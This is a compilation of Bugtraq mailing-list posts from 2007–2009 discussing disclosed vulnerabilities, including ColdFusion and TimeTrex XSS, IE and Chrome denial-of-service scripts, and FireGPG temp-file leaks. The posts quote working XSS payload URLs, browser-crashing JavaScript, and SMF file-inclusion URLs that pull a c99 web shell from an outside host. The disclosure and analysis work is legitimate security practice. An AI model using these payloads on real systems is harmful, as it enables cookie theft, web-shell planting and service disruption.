> --
> Fran
> 
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkunqlwACgkQnvIkv6fg9hZ9xgCeN2pHJd7cR/K0XoLAI4MKSR7P
6TsAn2gJ5czYDikEK25OcVsZngS/lGIN
=xb7R
-END PGP SIGNATURE-

Re: [DSECRG-09-022] Adobe Coldfusion 8 Multiple Linked XSS Vulnerabilies

[Mike Duncan]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


You mention the issues had been resolved and provide a link, but the
link seems dead now. Could you please update with a proper reference to
Adobe if possible with information on how these issues were resolved.

Thanks.

Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center


resea...@dsecrg.com wrote:
> http://www.dsecrg.com/pages/vul/show.php?id=122
> 
> 
> Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-022
> 
> Application:Adobe Coldfusion 8  
> Versions Affected:  Adobe Coldfusion 8
> Vendor URL: http://adobe.com
> Bugs:   Multiple Linked XSS,XSRF
> Exploits:   YES
> Reported:   12.01.2009
> Vendor response:13.01.2009
> Date of Public Advisory:17.08.2009
> CVE-number: CVE-2009-1872
> Author: Alexander Polyakov
> Digital Security Research Group [DSecRG] 
> (research [at] dsecrg [dot] com)
> 
> Description
> ***
> 
> Multiple Linked XSS and XSRF vulnerabilities found in Adobe Coldfusion Server 
> 8. Attacker can create evil link and steal administrators cookie
> 
> 
> Details
> ***
> 
> 1. Multiple Linked XSS vulnerabilities found in Adobe Coldfusion Server 8. 
> 
> 
> 1.1 Linked XSS vulnerability found in script searchlog.cfm. vulnerable 
> parameter startRow
> 
> 
> Example
> ***
> 
> http://localhost:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E
> 
> 1.2 Linked XSS vulnerability found in script _logintowizard.cfm. Attacker can 
> inject XSS in url string
> 
> 
> Example
> ***
> http://localhost:8500/CFIDE/wizards/common/_logintowizard.cfm?>'">alert('DSECRG_XSS')
> 
> 
> 1.3 Linked XSS vulnerability found in script _authenticatewizarduser.cfm. 
> Attacker can inject XSS in url string
> 
> Example
> ***
> http://localhost:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'">alert('DSECRG_XSS')
> 
> 
> 1.4 Linked XSS vulnerability found in script 
> _authenticatewizarduser.cfm.Attacker can inject XSS in url string
> 
> Example
> ***
> http://localhost:8500/CFIDE/administrator/enter.cfm?>'">alert('DSECRG_XSS')
> 
> 
> 
> Fix Information
> ***
> The issue has been solved 17 august 2009.  http://www.adobe.com/go/apsb09-12
> 
> 
> References:
> ***
> 
> http://www.adobe.com/go/apsb09-12
> http://www.dsecrg.com/pages/vul/show.php?id=122
> 
> 
> About
> *
> 
> 
> Digital Security is leading IT security company in Russia, providing 
> information security consulting, audit and penetration testing services, risk 
> analysis and ISMS-related services and certification for ISO/IEC 27001:2005 
> and PCI DSS standards. Digital Security Research Group focuses on web 
> application and database security problems with vulnerability reports, 
> advisories and whitepapers posted regularly on our website.
> 
> 
> Contact:research [at] dsecrg [dot] com
> http://www.dsecrg.com 
> 
> 
> 
> 
> 
> 
> 
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkqJdoIACgkQnvIkv6fg9haS8gCeP1tWQrOIA4Jnro/EhffOwPp8
4FsAn1u1QO4KuQaFDRTOkWgCxTx04D0H
=Myzk
-END PGP SIGNATURE-

RE: Insufficient Authentication vulnerability in Asus notebook

[Mike Wilson]

A better option is to set a strong password and set a local policy that the 
local admin account cannot be accessed over the network.  I'm a big advocate of 
that in all environments and prevents the need for renaming the account to 
prevent automated attacks.

Thanks,
_
Mike Wilson




-Original Message-
From: Susan Bradley [mailto:sbrad...@pacbell.net]
Sent: Thursday, May 14, 2009 2:39 PM
To: my.security.li...@gmail.com
Cc: MustLive; bugtraq@securityfocus.com
Subject: Re: Insufficient Authentication vulnerability in Asus notebook

We're talking XP Home here, right?  A admin account without a password
cannot be access remotely over the internet, so if you have physical
access at all times of that Asus netbook it's arguably more secure in
some circumstances.

nameless wrote:
> Susan Bradley wrote:
>
>> 3.  For XPs it's kinda handy to have a blank admin password when you
>> sometimes come in on a network and need to get to that particular
>> machine and you didn't set it up, otherwise you have to use the Admin
>> password boot disk trick and reset the password to blank.
>>
>
> You should only do the above recommendation, if you like to have your
> boxes owned.
>
> You should not have any administrative accounts named "Administrator"
> and _all_ administrative accounts should have a _STRONG_ password
> associated with them.
>
> No exceptions.
>
> Password safes are available at no charge.  If you somehow forget your
> password, you can always reset it via AD or resetting the SAM.
>
>
>

*** NOTICE--The attached communication contains privileged and confidential 
information. If you are not the intended recipient, DO NOT read, copy, or 
disseminate this communication. Non-intended recipients are hereby placed on 
notice that any unauthorized disclosure, duplication, distribution, or taking 
of any action in reliance on the contents of these materials is expressly 
prohibited. If you have received this communication in error, please delete 
this information in its entirety and contact the Amedisys Privacy Hotline at 
1-866-518-6684. Also, please immediately notify the sender via e-mail that you 
have received this communication in error. ***

RE: Insufficient Authentication vulnerability in Asus notebook

[Mike Wilson]

Agreed, it is an oversimplification (or a surrender) to say that good security 
practice is useless on a laptop or tablet because it is not a case of if you 
will not have complete control, but rather when and for how long.  Indeed, a 
comprehensive security plan becomes that much more important.  Look at every 
laptop as if you will never see it again and ensure that your data remains 
yours, to the best of your ability.

Of course, having XP home may be considered a vulnerability in and of itself, 
but that is another matter.

What we as a community have to realize is that we have new blood coming in all 
the time and issues like this being brought back up are good to ensure that 
something as simple as this is not missed because it is assumed that we all 
know it.

Thanks,
_
Mike Wilson


-Original Message-
From: Bob Fiero [mailto:i...@mentalfloss.net]
Sent: Thursday, May 14, 2009 10:12 AM
To: bugtraq@securityfocus.com
Subject: Re: Insufficient Authentication vulnerability in Asus notebook

> You get the idea.  This is non issue.

I disagree. You are involved in intense business negotiations. During lunch you 
leave your notebook unattended assuming it is safe with a password protected
userID. Your competitor goes in to the conference room and logs in with
Administrator and installs something like eBlaster to log everything
you do and email it to him.

Far fetched, but not a non-issue.

  _
From: Mike Vasquez [mailto:mike.vasq...@gmail.com]
To: Jeremy Brown [mailto:0xjbrow...@gmail.com]
Cc: MustLive [mailto:mustl...@websecurity.com.ua], bugtraq@securityfocus.com 
[mailto:bugt...@securityfocus.com]
Sent: Thu, 14 May 2009 11:02:38 -0400
Subject: Re: Insufficient Authentication vulnerability in Asus notebook

Once someone has physical access all bets are off, there's a lot the
can do.

1) steal it
2) boot off cd and reset/enable admin acct
3) boot off cd and grab all hashes
4) pour a perfectly good frappucino on the keyboard
5) cover it with smiley face stickers


You get the idea.  This is non issue.

*** NOTICE--The attached communication contains privileged and confidential 
information. If you are not the intended recipient, DO NOT read, copy, or 
disseminate this communication. Non-intended recipients are hereby placed on 
notice that any unauthorized disclosure, duplication, distribution, or taking 
of any action in reliance on the contents of these materials is expressly 
prohibited. If you have received this communication in error, please delete 
this information in its entirety and contact the Amedisys Privacy Hotline at 
1-866-518-6684. Also, please immediately notify the sender via e-mail that you 
have received this communication in error. ***

Re: Insufficient Authentication vulnerability in Asus notebook

[Mike Vasquez]

Once someone has physical access all bets are off, there's a lot the  
can do.


1) steal it
2) boot off cd and reset/enable admin acct
3) boot off cd and grab all hashes
4) pour a perfectly good frappucino on the keyboard
5) cover it with smiley face stickers


You get the idea.  This is non issue.





On May 14, 2009, at 6:37 AM, Jeremy Brown <0xjbrow...@gmail.com> wrote:


If you explore further research, you will find that this is not a bug,
this is well known, and its not particular to Asus.

2009/5/14 MustLive :

Hello SecurityFocus!

I want to warn you about Insufficient Authentication vulnerability  
in Asus

notebook.

After publication of information about Insufficient Authentication
vulnerability in Acer notebooks
(http://www.securityfocus.com/archive/1/503398/30/0/), I decided to
investigate all notebooks of my friends. Particularly I checked two  
Asus

notebooks: at one with Windows XP Professional there is no such
vulnerability, at another with Windows XP Home Edition there is such
vulnerability.

In Windows XP Home in default administrator's account  
"Administrator" there
is empty password. And it does not set equal to password of first  
admin,
when admin account is creating during first start of notebook (as  
it happens
during installation of Windows XP). So with physical access to  
notebook,

anybody can enter into the system with administrator's rights.

Vulnerable models of notebooks: Asus А6500R and potentially other  
models.


I mentioned about these vulnerability at my site
(http://websecurity.com.ua/3139/).

Now I'm continue to investigate this situation. If you'll find such  
case in

your notebook or in desktop PC, then inform me on email.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: Denial of Service using Partial GET Request in Mozilla Firefox 3.06

[Mike Duncan]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

xiash...@gmail.com wrote:
> It's been confirmed that this is not problem in IE. Sorry I didn't mention 
> that. Microsoft uses Silverlight:
> 
> GET /index.php?page=Poem/Poem.php HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
> application/x-ms-application, application/vnd.ms-xpsdocument, 
> application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, 
> application/x-silverlight, */*

...and how did you confirm that? By seeing Silverlight in the accepted
mime-types header? Silverlight is a plugin which is a lot like the Flex
framework for Flash, only for .Net. So, I guess you have a Silverlight
application installed to play .WAV files, but this does not change the
fact that anything outside of IE (which has the Silverlight extension
installed) will use whatever the default media player is on your PC.

> Accept-Language: en-au
> UA-CPU: x86
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET 
> CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
> Host: www.footprints-inthe-sand.com
> Connection: Keep-Alive
> 
> It could either be because of what Sean said with the Range request or the 
> Partial GET Request in Firefox. But I think you are probably correct Rolphin, 
> as I've had a lot of Windows Media Player crashes recently. Either way, 
> Windows Media Player should probably not be incorporated into Firefox if it's 
> going to crash. A more stable platform should be used (such as Silverlight)

You can choose a different player within the preferences of Firefox.
What is the problem again?

- --
Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkmVp6oACgkQnvIkv6fg9haRoQCfZnSsBLB7FmFKHWAM3GGaX4Da
k6YAn1rTkC+aog6Aj1pw9IxiAQfcRjfC
=FaH3
-END PGP SIGNATURE-

FireGPG Passphrase And Cleartext Vulnerability

[Mike Benham]

Vulnerability Affecting FireGPG Passphrase and Cleartext Recovery
10/20/2008

Abstract

FireGPG is a Firefox extension that provides a front-end to GPG,
allowing webmail users to conveniently exchange GPG messages from
Firefox.

Unfortunately, the way that FireGPG handles the user's passphrase and
decrypted cleartext is not secure and may result in the compromise of
secure communication or a users's private key.


Description

FireGPG does its encrypt/decrypt/sign/verify operations by shelling out
to a locally installed GPG executable.  The problem is that instead of
using stdin/stdout to pass information, it writes everything to disk
and passes the files as arguments.

When a user receives an encrypted email and asks FireGPG to decrypt it,
FireGPG prompts the user for her passphrase and then creates three
temporary files.  One for the ciphertext, one for the resulting
cleartext (!), and one for the user's passphrase (!).  The user's
passphrase is then written to disk, and the temporary file in which it
resides is passed to the gpg executable as a command-line argument. The
cleartext from the decrypt operation is then written to disk as well,
from where it is subsequently read and displayed to the user.  The same
process occurs for emails that are being encrypted and signed.  Notably,
in the latter cases the pre-encrypted cleartext is written to disk, as
is the passphrase for the signing key.

Obviously, there are a number of attack vectors here.  If an adversary
were to seize the user's disk, they would easily be able to recover the
passphrase used in previous FireGPG operations. In that case, all past
correspondence secured by that key would be compromised.  Even if the
user had just changed their passphrase and hadn't used FireGPG since
then, the adversary would be still be able to recover copies of
decrypted and pre-encrypted cleartext emails that touched the disk.

Additionally, as another vector of attack, the temporary files that
FireGPG creates for storing this information are constructed with
predictable filenames.  It is possible for someone with an account on
the same machine to exploit the race condition that results at the time
these files are created, such that the output from a decrypt operation
is written to a symlink which points to a file that they own -- thus
eliminating the need for data recovery.  There is a working exploit for
this.


Severity

Users who are serious about securing their data and communication
against a threat model that includes others gaining access to their
machines (either through hardware seizure or multiple user accounts)
should change their passphrases and scrub their disks.

=
Affected Versions

All versions of FireGPG previous to 0.6 are vulnerable.  Version 0.6 was
released on 10/17/2008 in response to this issue.

- moxie

-- 
Thoughtcrime:   http://www.thoughtcrime.org
Audio Anarchy:  http://www.audioanarchy.org
Anarchist Yacht Clubb:  http://www.blueanarchy.org

Re: MS Internet Explorer 7 Denial Of Service Exploit

[Pruett, Mike]

 
Neat PoC. However, this requires the users to have configured IE to run
Active-X content. On my test machines, I was prompted by the Browser
before the code ran. Surprisingly, CSA never stopped it.

I tested this on:
Internet Explorer 7 on Windows XP 32-bit w/ Cisco Security Agent
v5.0.0.176
Internet Explorer 7 on Vista 32-bit (no CSA)

Thanks,

Mike Pruett
-Original Message-
From: Jan van Niekerk [mailto:[EMAIL PROTECTED] 
Sent: Monday, September 29, 2008 10:37 PM
To: [EMAIL PROTECTED]
Cc: bugtraq@securityfocus.com
Subject: Re: MS Internet Explorer 7 Denial Of Service Exploit

This DOS works quite nicely on Konqueror / KDE 3.5.9 too.

jv.

On 29 Sep 2008 19:59:55 -, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
> 
>
>  MS Internet Explorer 7 Denial Of Service Exploit  
>size="2" color="#FF">MS Internet Explorer 7 Denial Of Service 
> Exploit src="http://img81.imageshack.us/img81/8881/wallpaperxl0.jpg";>
>  
>  
>  
>  var x=String.fromCharCode(550);
>  var x2="";
>  var x3="";
>  for(i=0;i<1549;i++)
>  {x2=x2+x;}
>  for(i=0;i<1549;i++)
>  {x3=x3+x2;}
>  var x4=x;
>  for(i=0;i<105;i++) x4 += x4;
>  for(i=0;i<165;i++) x4 += x3;
>  var wildboy=escape(x4);
>  alert(wildboy);
>  
>  
>  WiLdBoY 
> a.k.a UniquE-Key{UniquE-Cracker} n.s.n Mert KAYALAR
>  color="#FF">[EMAIL PROTECTED]
>  
>  -Software 
> Hunter-
>
>  
>

Re: Chrome(0.2.149.27) title(not the tag) Denial of Service(Freeze) exploit

[Mike Duncan]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Yeah, when you do that, it is generating a tool-tip to display.

Additionally, the large number of iterations this script must run
through may cause a crash due to resource exhaustion.

Have you tested further to see what values actually produce the results
or are we going on the assumption that is a very large number?

Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center
[EMAIL PROTECTED]


Rotem Kerner wrote:
| this successfully freezed my chrome on both Vista & XP platforms
| dont move your mouse for a sec while its laying on the white background
| and it should freeze.
|
| Exodus.
|
| http://www.blackhat.org.il
| "imagination is more importan than knowledge"
|> I could not duplicate this with either Chrome v0.2.149.29. I think
|> this problem was now solved.
|>
|> --
|> _Wellington Wagner F. Sarmento
|>
|> "Where is the wisdom we have lost in knowledge?
|> Where is the knowledge we have lost in information?"
|> T.S. Eliot
|>
|>
|>> a vulnerability was found which allow a remote attacker to freeze the
|>> users
|>> browser
|>> by convincing him to visit a malicious web page
|>>
|>> Chrome(0.2.149.27) Denial of Service(Freeze) exploit poc:
|>> http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html
|>>
|>> Exodus.
|>>
|>>
|>>
|>>
|>>
|> --
|> _Wellington Wagner F. Sarmento
|> "Where is the wisdom we have lost in knowledge?
|> Where is the knowledge we have lost in information?"
|> T.S. Eliot
|>
|>
|>
|>
|
|
|
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIxr19nvIkv6fg9hYRArtYAJ9XNmuZqbUXzw4/6Wa5Q1h8eR2jNwCdHKNh
ixXVtaTQr1dM/hyWwLNSWQc=
=2SJC
-END PGP SIGNATURE-

Re: Chrome(0.2.149.27) title(not the tag) Denial of Service(Freeze) exploit

[Mike Duncan]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


I could not duplicate this with either Chrome or Safari (which also uses
WebKit). I am using WinXP SP3 and Chrome v0.2.149.27 build 1538. I
wonder if this is instead an issue with your Windows installation
rendering the tool-tip for the title (which is default with browsers
using WebKit).

I tried varying values all the way up to 2147483647. Of course, the
script running these high values would take a long time to complete the
loop -- but that is to be expected.

Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
[EMAIL PROTECTED]


Rotem Kerner wrote:
| a vulnerability was found which allow a remote attacker to freeze the
| users browser
| by convincing him to visit a malicious web page
|
| Chrome(0.2.149.27) Denial of Service(Freeze) exploit poc:
| http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html
|
| Exodus.
|
|
|
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD4DBQFIxWRHnvIkv6fg9hYRAnUqAJdM1yO2L0MoUJcM8rbKCjkHQ1EzAKCQZaEh
OhKfgPnoocKhaz/ILWRBxw==
=18Pq
-END PGP SIGNATURE-

Re: TimeTrex Time and Attendance Cookie Theft

[Mike]

This issue only affects TimeTrex v2.2.12 and older. 

TimeTrex v2.2.13 and newer are patched, the latest version can be
downloaded from:

http://www.timetrex.com/

or

http://sourceforge.net/project/showfiles.php?group_id=174864&package_id=200595

Thanks.


On 21 Aug 2008 16:50:07 -
[EMAIL PROTECTED] wrote:

> [HSC] TimeTrex Time and Attendance Cookie Theft
> 
> 
> TimeTrex allows companies to track and monitor employee attendance
> accurately in real-time from anywhere
> 
> in the world. An attacker may leverage these issues to execute
> arbitrary script code in the browser of
> 
> an unsuspecting user in the context of the affected site. Attacker
> can tricks the user's computer into
> 
> running code which is treated as trustworthy because it appears to
> belong to the server, allowing the
> 
> attacker to obtain a copy of the cookie or perform other operations.
> 
> 
> 
> Hackers Center Security Group (http://www.hackerscenter.com)
> Credit: Doz
> 
> Class: Cross Site Scripting
> Remote: Yes
> 
> Product: TimeTrex
> Vendor: http://www.timetrex.com
> Version: N/A
> 
> 
> Attackers can exploit these issues via a web client.
> 
> 
> http://site.com/interface/Login.php?user_name=admin&password=XSS
> http://site.com/interface/Login.php?user_name=XSS
> 
> 
> 
> 
> Google Dork: TimeTrex Time and Attendance - Secure Login
> 
> Reference: 
> 
> http://www.hackerscenter.com/index.php?/HSC-Research-Group/Advisories/HSC-TimeTrex-Time-and-Attendance-Cookie-Theft.html


-- 
Mike ([EMAIL PROTECTED])

SYM08-015_SFW_SecurityUpdateBypass

[Mike Prosser]

The attached is  a signed version of the security advisory for Symantec Storage 
Foundation for Windows 5.x that was released today.  If we can get the 
signature to verify, please post to bugtraq 

Regards
 <> 


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Symantec Product Security/Vulnerability Management Team
Symantec takes the security of our products seriously as a responsible
disclosure company.  You can view our response policies at
http://www.symantec.com/security.
We will work directly with anyone who believes they have found a security
issue in a Symantec product to validate the problem and coordinate any 
response deemed necessary. 
 
Please contact [EMAIL PROTECTED] concerning security issues with Symantec
products.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.0.6 (Build 6060)

iQEVAwUBSKR0PF1lCKGx9Sr8AQh1/gf/Y+AWFzHBxOGQwoQTAko7kxLQVf7jeC3d
O0jQrpLN7VMgwtu20P9+Zxan0C/pmkCnTu/LnjLJZkSMzZzqX00AXTYV4dM093LH
6ySn5jkB7JbNAUFCjvF/AOUuHu6uCLxoN1lE1uqg+gr9AQ3jwCFY05t+lsmnhNke
gbJQ7uPlsPavu9EtXyXZ/JRbfXZYJLlChyeVm9raUWknUGlEo3M8eNVS2D/WItdv
o5dsydaOjpr8sqC5Tq0FpTqs+PWh5c/qopyTiwbtLcJ99WuANh6K2L1adAxSEWLu
U09m0RVv4RsssLOqVJWgEFNhchch4O/OTG1Z7TCIAGF6rbIbSAW8RQ==
=pdAD
-END PGP SIGNATURE-  
 


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Symantec Security Advisory

SYM08-015

14 Aug, 2008

Veritas Storage Foundation for Windows Volume Manager Scheduler Service for
Windows Security Update Circumvention 

Revision History
None 

Severity
Medium 

Remote Access Yes, network access required
Local Access No
Authentication Required No
Exploit publicly available No

Overview
It is possible to circumvent the security patch that resolved a previously
identified authentication bypass, remote code execution 
vulnerability in the Veritas Storage Foundation for Windows v5.0 Volume
Manager Scheduler Service.Successful exploitation 
could result in potential compromise of the targeted system.

Product(s) Affected 
Product Version Solution(s)
Veritas Storage Foundation for Windows 5.0, 5.0 RP1a, 5.1 
http://entsupport.symantec.com/docs/306386

Note:  Only those versions identified above are affected by this issue.

Details
3Com Zero Day Initiative, notified Symantec of a vector that can allow a
malicious user to circumvent the security update for an 
authentication bypass vulnerability previously reported in the Veritas
Storage Foundation for Windows Scheduler Service,
http://www.symantec.com/avcenter/security/Content/2007.06.01.html.  
The Scheduler Service server, introduced in Veritas Storage Foundation for
Windows v5.0, listens for incoming scheduling messages
from client systems.  An attacker with network access who could connect
directly to the Scheduler Service socket could bypass the
security update to the previously reported issue.  By properly manipulating
this vector, the attacker has the potential to add 
arbitrary commands to the registry that, if properly constructed, would be
executed on the targeted system during normal scheduled runs.

Symantec Response
Symantec engineers have verified and resolved this issue in the Veritas
Storage Foundation for Windows versions and builds identified above. 

Symantec recommends customers apply the latest product update available for
their supported product versions to enhance their security 
posture and protect against potential security threats of this nature.

Symantec knows of no exploitation of or adverse customer impact from this
issue.


The patches listed above for affected product/version are available from
the following location:
http://entsupport.symantec.com/docs/306386

Best Practices
As part of normal best practices, Symantec strongly recommends: 
* Restrict access to administration or management systems to privileged
users.
* Restrict remote access, if required, to trusted/authorized systems only.
* Run under the principle of least privilege where possible to limit the
impact of exploit by threats. 
* Keep all operating systems and applications updated with the latest
vendor patches. 
* Follow a multi-layered approach to security. Run both firewall and
anti-malware applications, at a minimum, to provide multiple points
of detection and protection to both inbound and outbound threats. 
* Deploy network and host-based intrusion detection systems to monitor
network traffic for signs of anomalous or suspicious activity. 
This may aid in detection of attacks or malicious activity related to
exploitation of latent vulnerabilities


Credit:
Symantec would like to thank Tenable Security working through 3Com ZDI for
reporting this issue and for providing coordination 
while Symantec resolved it.

References:
SecurityFocus, http://www.securityfocus.com, has assigned a Bugtraq ID
(BID), 30596 to this issue for inclusion in the SecurityFocus 
vulnerability data base. The BID can be found at
http://www.securityfocus.com/bid/30596 

This issue is a candidate for inclusion in the CVE list
(http://cv

RE: Internet explorer 7.0 spoofing

[Mike Diaz]

He's basically saying that if you create a popup small enough
width-wise, then you can hide everything before the # so that unless
the user actually goes into the address bar and scrolls left, all they
will see is what you put after the #. Here's a screenshot so you can
see what he's talking about:
http://lh6.google.com/mikediaz.360/R_PpsHN-hCI/ABc/_F2JZMpUiS4/Screenshot.png

Re: Smf 1.1.4 Remote File Inclusion Vulnerabilities

[Mike Duncan]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

If you look at the source, it is looking for a constant SMF and if this
is undefined, it will die with that error message.

- From line 24 of Sources/Themes.php:
if(!defined('SMF'))
die('Hacking attempt...');


I looked over the source and like so many of these RFIs coming out
lately, they highly depend on register_globals being on as well.

I think s/he is specifically pointing to line 913 of Sources/Themes.php
as well...
if (file_exists($settings['theme_dir'] . '/languages/Settings.' .
$user_info['language'] . '.php'))
  include($settings['theme_dir'] . '/languages/Settings.' .
$user_info['language'] . '.php');

(sorry for wrapping)


sibertrwolf: Just a suggestion, you may want to put a bit more
information in your disclosures like what versions of PHP and what INI
settings you have set.


Jindrich Kubec wrote:
> At 11:00 28.3.2008, [EMAIL PROTECTED] wrote:
>> #
>> /Sources/Subs-Graphics.php?settings[default_theme_dir]=http://bilmemne.siz/c99.txt?
>>
>> #
>> #  /Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt?
> 
> What is it supposed to do? I'm getting only "Hacking attempt..."
> 
> 
> Jindroush ([EMAIL PROTECTED])
> 
> 

- --
Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center
151 Patton Ave.
Asheville, NC 28801-5001
[EMAIL PROTECTED]
828.271.4289
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH7T3+nvIkv6fg9hYRAry+AJ4si3vF7CMQ2aVhK9OEJFhoWI6mGQCfSrr8
5HSu5zJGQEJuqSZVIYlGf/w=
=I2f6
-END PGP SIGNATURE-

Active Gmail "Sidejacking" - https is NOT ENOUGH

[Mike Perry]

I have noticed several media articles recommending that users use
https to protect their gmail sessions from Robert Graham's
"Sidejacking" attackers. 

It turns out that independent of Mr. Graham's work, I have also been
investigating these types of attacks as they pertained to users'
safety while they use the Tor network.

As I presented in my Black Hat and DefCon talks on Securing the Tor
Network, it turns out that using https for accessing mail.google.com
is not sufficient to protect you from many "Sidejacking" attacks. The
'GX' authentication cookie for mail.google.com is set to be
transmitted for any type of connection (http or https). This is the
only cookie one needs to authenticate to gmail.

This "Any type of connection" property allows an attacker execute a
cross site request forgery attack to inject spoofed
'http://mail.google.com' content elements or meta-refresh tags into
ANY WEB PAGE loaded by a user. Repeat: the user does NOT have to be
using gmail at the time, they just need to have a valid 'GX'
authentication cookie from a prior login, and then visit ANY WEBSITE.
Upon fetching/executing these injected elements, the browser will
transmit the 'GX' cookie in the clear for the load of the spoofed
element.

Arp spoofing, DHCP spoofing, DNS spoofing, and TCP race-based attacks
(such as AirPwn) are all valid vectors for inserting these content
elements.

The ONLY way to be safe is to clear your google cookies immediately
after using gmail, or to mash the logout button. Obviously, being a
privacy advocate, I would prefer everyone did the former :)

Many other sites also have this same problem. In fact, I just
purchased an item from a site that failed to enforce that its cookies
are transmitted for "Encrypted Sessions Only".  The FireFox addon
CookieCuller is a nice easy way to inspect this property of cookies.
You should check your banks :)

Security is a hobby of mine - unfortunately I have neither the
interest nor the time to produce a proof of concept of this attack.
Quite frankly, I'd rather spend my free time helping to improve the
Tor network, rather than releasing attacks that may compromise its
users or the general public. My reluctance to release does not stem
from any particular moral opposition to full disclosure. If google and
other sites continue to ignore this issue, I may be motivated to make
a release. It is very likely "bad guys" will beat me to it anyway,
because this attack is relatively simple with the right MITM tools.

You can verify the validity of this attack by logging in to
https://mail.google.com. You will remain in https://mail.google.com
after the login is complete. Now, use CookieCuller to blow away all
but the 'GX' cookie. After this, close your gmail tab, and then visit
http://mail.google.com. You will still be authenticated.

-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs


pgpxh2XwlYPq7.pgp
Description: PGP signature

Re: Internet Explorer Crash

[Mike Ely]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nope.  Ran this one against Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2, and it
didn't even flinch.  No OOM-killing here.

On the other hand, Konqueror 3.5.5 "release 45.4" churned swap madly for
about five minutes (the machine continued to run well enough if just a
bit slower) until Konq sig-sixed itself.

Cheers

The Anarcat wrote:
> Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
> rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)
> 
> I would think that Firefox and most browsers implementing javascript
> would die an horrible OOM death on this.
> 
> A.
> 
> On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
> 
> 
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
> 
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
> 
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
> 
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
> 
> V. Code
> 
> $ more /stupidInternetExploder.html
> 
> 
> 
> var reg = /(.)*/;
> 
> var z = 'Z';
>while (z.length <= 
> 999
> 99
> 99
> 99
> 99)
>  z+=z;
>var boum = reg.exec(z);
> 
> 
> 
> Goodbye
> 
> 
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> sil . infiltrated @ net http://www.infiltrated.net 
> 
> The happiness of society is the end of government.
> John Adams
> 
> 
>>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org

iD8DBQFGJVHvtHLm/XkyJlsRApr1AKCLOVJLSHhSRV9edwUm2QNLNry9RwCgxFeX
N1X/wJSO4U4Sx3z5Yn0S6Tk=
=T/tc
-END PGP SIGNATURE-

Re: Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

[Mike]

Well, Just a warning b4 running the proof of concept... Make sure to close and 
save useful stuff. It indeed works on xp sp2 and it will reboot your machiene. 
I have to say, This would be trick to exploit another programs messagebox, and 
wha joy could you possibly get out of restarting someone computer. I dont think 
there is possiblility for any code execution, as far as I seen. Would be a nice 
S-Kiddy toy if you could do it remotely, but would also piss off alot of people.

Call for papers and presenters - Dec. 15th deadline

[Mike Allgeier]

